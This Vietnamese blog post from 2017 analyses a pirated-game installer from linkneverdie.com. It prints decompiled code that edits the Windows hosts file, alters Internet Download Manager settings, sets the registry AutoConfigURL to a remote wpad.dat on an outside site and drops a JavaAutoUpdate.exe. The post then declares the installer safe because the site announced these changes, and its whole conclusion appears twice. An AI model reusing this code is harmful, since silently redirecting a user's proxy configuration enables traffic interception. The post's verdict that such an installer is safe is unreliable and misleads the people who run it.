Bài viết chỉ mang tính chất tham khảo. Được thực hiện mởi Linux Team Việt Nam và X-Groups VN.
Chúng tôi đứng ở vị trí trung gian, không ủng hộ hay phản đối bất cứ bên nào
Do viết bài vội nên tôi viết nhầm File Setup thành File Crack, xin lỗi các bạn
Gần đây, trên mạng xuất hiện video này của trang linkneverdie.vip tố cáo rằng Linkneverdie.com phát tán virus. Trong 1 file Game GOG (Cup Head).
Mời bạn xem qua đoạn clip đã
Ngay bây giờ, chúng tôi sẽ mổ xẻ file setup của Link Never Die.com để tìm hiểu xem nó thực sự đang làm gì trong máy các bạn
Khi tải về unpack ra thì được thư mục này, sau khi xem xét, thấy trong folder source chỉ có 2 file.bin nên chúng tôi trực tiếp phân tích file setup-gog.exe (File này đã được LND sửa lại)
Khi phân tích, chúng tôi thấy file này có 2 Form, 1 from để cài đặt, 1 form để block một số trang Web.
Do From 1 chả có gì bất thường nên chúng tôi sẽ đi phân tích Form 2 thôi
Mã nguồn From 2: GitHub của thành viên X-Groups
Ở đây có 2 điều chúng ta cần lưu ý
Điều 1: Dòng Dim path As String = Path.Combine(Environment.GetFolderPath(SpecialFolder.System), "drivers/etc/hosts")
Dòng này có nhiệm vụ tìm và chỉnh sửa file hosts của máy bạn
Sửa để chặn 1 loạt website phía dưới. Ví dụ như dòng
writer4.WriteLine("127.0.0.1" & ChrW(9) & "linkneverdie.vip")
writer4.WriteLine("127.0.0.1" & ChrW(9) & "linkneverdie.vip")
Là để thêm dòng 127.0.0.1 linkneverdie.vip vào file hosts, suy ra khi người dùng truy cập linkneverdie.vip thì sẽ bị trỏ về 127.0.0.1 => Bị chặn
Sau khi cài mà chúng ta ping tới linkneverdie.vip sẽ thấy show ra IP 127.0.0.1
Lí giải cho việc này, Link Never Die đã có phản hổi từ rất lâu rồi
Quá trình cài game này vào máy trên thực tế cũng cho thấy file hosts bị sửa
Lại có thêm dòng Dim str3 As String = "C:\Program Files (x86)\Internet Download Manager\defexclist.txt"
Nội dung file defexclist.txt
Có vẻ như file này để ngăn chặn IDM tải file từ mấy trang trong file về.
Trong video trên, bên lnd.vip cũng chỉ ra file JavaAutoUpdate.exe chứa Virus và trong file setup-gog.exe cũng xuất hiện các dòng
Dim key As RegistryKey = Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Internet Settings", True)
key.SetValue("AutoConfigURL", "http://jav60fps.com/wpad.dat")
key.Close
Dim _convert As New Bnr_convert
Directory.CreateDirectory(Path.Combine(Environment.GetFolderPath(SpecialFolder.LocalApplicationData), "JavaUpdate/"))
Dim pathcreatefile As String = Path.Combine(Environment.GetFolderPath(SpecialFolder.LocalApplicationData), "JavaUpdate/JavaAutoUpdate.exe")
Dim txtconvert As New RichTextBox With { _
.Text = File.ReadAllText("patch.ini") _
}
Ý nghĩa của nó là gì, nó sẽ sửa Internet Settings trong máy bạn bằng file cấu hình lấy từ jav60fps.com/wpad.dat
Trong quá trình cài đặt thực tế cũng phát hiện truy xuất tới IP 104.18.57.216. IP của trang javv60fps.com trên
Registry cũng bị thay đổi. AutoConfigURL. Lấy Config từ trang cho trước
Nội dung file wpad.dat GitHub của thành viên X-Groups
Mã nguồn File JavaAutoUpdate.exe cũng không ngoại lệ
Và khi truy cập vào trang trên nó lại ra taigame.org ÔI WTF
Và đây là thông tin đăng kí của tên miền trên
Kết luận
1. File Setup do LND làm chỉ có nhiệm vụ block các trang web mà LND cho rằng ăn cắp link của LND. Điều này đã được Admin LND giải thích rõ trong 2 thông báo trên page:
Thông báo ngày 29/4
Thông báo ngày 20/10
2. Trong quá trình kiểm tra trên thực nghiệm, chúng tôi không thấy LND kết nối tới bất cứ nguồn nào bất thường, do vậy, file setup của LND được gọi là an toàn nếu bạn đồng ý với những điều Admin Link Never Die thông báo lên Page
3. Bài viết này khẳng định video nói LND phát tán virus là sai, vì mọi việc LND làm đã có thông báo rõ ràng trên page.
4. Như vậy, file crack của LND không gây nguy hiểm, không đánh cắp dữ liệu người dùng, không có keylogger, trojan. Hay tóm lại, ngoài làm 2 việc: Cài đặt Game + Chỉnh sửa hosts và cài đặt mạng (Những gì mà LND đã công bố CÔNG KHAI) và member khác đều biết
5. Có ý kiến nói rằng Linkneverdie.com đang muốn chiếm thế độc quyền, thì riêng ý kiến cá nhân tôi như sau
- Khi member tin tưởng vào 1 web chia sẻ game nào rồi, thì họ sẽ có xu hướng tải từ web đó mà không qua web khác, vì vậy việc chiếm thế độc quyền là không cần thiết
- Các trang web khác đang lợi dụng sự thiếu hiểu biết của người dùng (Cứ thấy nói virus, trojan là nhảy dựng đứng lên vì sợ), để lôi kéo người dùng về bên họ. Bôi nhọ danh tiếng linkneverdie.com
- Lí do LND đưa ra về việc block file hosts là chính đáng vì theo tìm hiểu kĩ, công sức upload và giữ gìn link không chết của họ là sự thật.
- Việc LND thu link Google VIP không phải là do Boss Linkneverdie đặt ra mà là do MEMBER YÊU CẦU. Tại sao MEMBER đã bỏ tiền DONATE mà vẫn phải download link bị khóa 24h, cần có 1 ĐƯỜNG LINK RIÊNG cho họ.
- Hơn nữa, việc thu phí là một việc làm cần thiết để duy trì việc hoạt động, nhưng ở một mức độ nào đó, hiện tại Linkneverdie.com không ÉP BUỘC member Donate như taigame.org. Việc link bị khóa 24h, là do độ HOT của game, là do uy tín của Linkneverdie gây ra
- Chưa có web tải game crack nào hướng dẫn member CẶN KẼ như linkneverdie.com. Không phải cầm tay chỉ việc mà nói cho họ HIỂU và TỰ LÀM được.
6. Lại có ý kiến cho rằng Tự ý can thiệp vào file hê thống và cài đặt tùy chỉnh của người khác khi không được phép dù bất cứ mục đích tốt hay xấu nào thì cũng là xâm phạm bất hợp pháp rùi.
- Việc bạn bấm Yes khi cài đặt 1 chương trình, thì bạn đồng ý với những gì chương trình đó yêu cầu
- Đã bao giờ bạn tự hỏi, nhưng chương trình crack hoặc setup khác (Không do LND làm) đang làm gì trong máy bạn chưa. Họ có thông báo gì không. Đây LND đã có thông báo công khai, minh bạch
Hết bài
Tác giả: Nguyễn Anh Kiệt và 1 thành viên của X-Groups VN.
Đăng lúc 21:50PM (GMT+7) ngày 21/10/2017
Và đây là thông tin đăng kí của tên miền trên
Kết luận
1. File Setup do LND làm chỉ có nhiệm vụ block các trang web mà LND cho rằng ăn cắp link của LND. Điều này đã được Admin LND giải thích rõ trong 2 thông báo trên page:
Thông báo ngày 29/4
Thông báo ngày 20/10
2. Trong quá trình kiểm tra trên thực nghiệm, chúng tôi không thấy LND kết nối tới bất cứ nguồn nào bất thường, do vậy, file setup của LND được gọi là an toàn nếu bạn đồng ý với những điều Admin Link Never Die thông báo lên Page
3. Bài viết này khẳng định video nói LND phát tán virus là sai, vì mọi việc LND làm đã có thông báo rõ ràng trên page.
4. Như vậy, file crack của LND không gây nguy hiểm, không đánh cắp dữ liệu người dùng, không có keylogger, trojan. Hay tóm lại, ngoài làm 2 việc: Cài đặt Game + Chỉnh sửa hosts và cài đặt mạng (Những gì mà LND đã công bố CÔNG KHAI) và member khác đều biết
5. Có ý kiến nói rằng Linkneverdie.com đang muốn chiếm thế độc quyền, thì riêng ý kiến cá nhân tôi như sau
- Khi member tin tưởng vào 1 web chia sẻ game nào rồi, thì họ sẽ có xu hướng tải từ web đó mà không qua web khác, vì vậy việc chiếm thế độc quyền là không cần thiết
- Các trang web khác đang lợi dụng sự thiếu hiểu biết của người dùng (Cứ thấy nói virus, trojan là nhảy dựng đứng lên vì sợ), để lôi kéo người dùng về bên họ. Bôi nhọ danh tiếng linkneverdie.com
- Lí do LND đưa ra về việc block file hosts là chính đáng vì theo tìm hiểu kĩ, công sức upload và giữ gìn link không chết của họ là sự thật.
- Việc LND thu link Google VIP không phải là do Boss Linkneverdie đặt ra mà là do MEMBER YÊU CẦU. Tại sao MEMBER đã bỏ tiền DONATE mà vẫn phải download link bị khóa 24h, cần có 1 ĐƯỜNG LINK RIÊNG cho họ.
- Hơn nữa, việc thu phí là một việc làm cần thiết để duy trì việc hoạt động, nhưng ở một mức độ nào đó, hiện tại Linkneverdie.com không ÉP BUỘC member Donate như taigame.org. Việc link bị khóa 24h, là do độ HOT của game, là do uy tín của Linkneverdie gây ra
- Chưa có web tải game crack nào hướng dẫn member CẶN KẼ như linkneverdie.com. Không phải cầm tay chỉ việc mà nói cho họ HIỂU và TỰ LÀM được.
6. Lại có ý kiến cho rằng Tự ý can thiệp vào file hê thống và cài đặt tùy chỉnh của người khác khi không được phép dù bất cứ mục đích tốt hay xấu nào thì cũng là xâm phạm bất hợp pháp rùi.
- Việc bạn bấm Yes khi cài đặt 1 chương trình, thì bạn đồng ý với những gì chương trình đó yêu cầu
- Đã bao giờ bạn tự hỏi, nhưng chương trình crack hoặc setup khác (Không do LND làm) đang làm gì trong máy bạn chưa. Họ có thông báo gì không. Đây LND đã có thông báo công khai, minh bạch
Hết bài
Tác giả: Nguyễn Anh Kiệt và 1 thành viên của X-Groups VN.
Đăng lúc 21:50PM (GMT+7) ngày 21/10/2017
